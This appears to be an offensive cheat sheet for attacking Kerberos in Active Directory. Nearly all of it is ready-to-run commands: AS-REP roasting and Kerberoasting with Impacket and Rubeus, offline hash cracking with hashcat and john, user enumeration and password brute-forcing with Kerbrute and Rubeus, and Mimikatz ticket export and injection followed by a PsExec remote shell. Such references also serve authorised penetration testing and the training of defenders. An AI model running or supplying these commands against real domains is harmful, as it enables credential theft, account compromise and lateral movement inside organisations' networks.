Kerberoast
Tools
Rubeus: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe
Kerbrute: https://github.com/ropnop/kerbrute
Impacket: https://github.com/SecureAuthCorp/impacket
ASREP-Roast
Impacket
# ASREP check on all domain Users (Requires valid domain credentials)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"
# ASREP check on a list of domain user (Does not require domain credentials)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"Rubeus
# Extract from all domain accounts
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txtCracking
# Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
# Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyouBrute Force
Kerbrute
Download: https://github.com/ropnop/kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>Rubeus
# with a list of users
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>
# Check all domain users again password list
.\Rubeus.exe brute /passwords:<Wordlist>Kerberoasting
Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -requestRubeus
# Kerberoast all users in Domain
.\Rubeus kerberoast
# All Users in OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local
# Specific users
.\Rubeus.exe kerberoast /user:File_SVCPass-The-Ticket
Mimikatz
# Collect tickets
sekurlsa::tickets /export
# Inject ticket
kerberos::ptt <.kirbi file>
# spawn CMD with the injected ticket
misc::cmdRubeus
# Collect tickets
.\Rubeus.exe dump
# Inject ticket
.\Rubeus.exe ptt /ticket:<.kirbi file>PsExec
# To be used after injecting ticket with either Rubeus or Mimikatz
.\PsExec.exe -accepteula \\<IP> cmdSilver Ticket
Golden Ticket
Last updated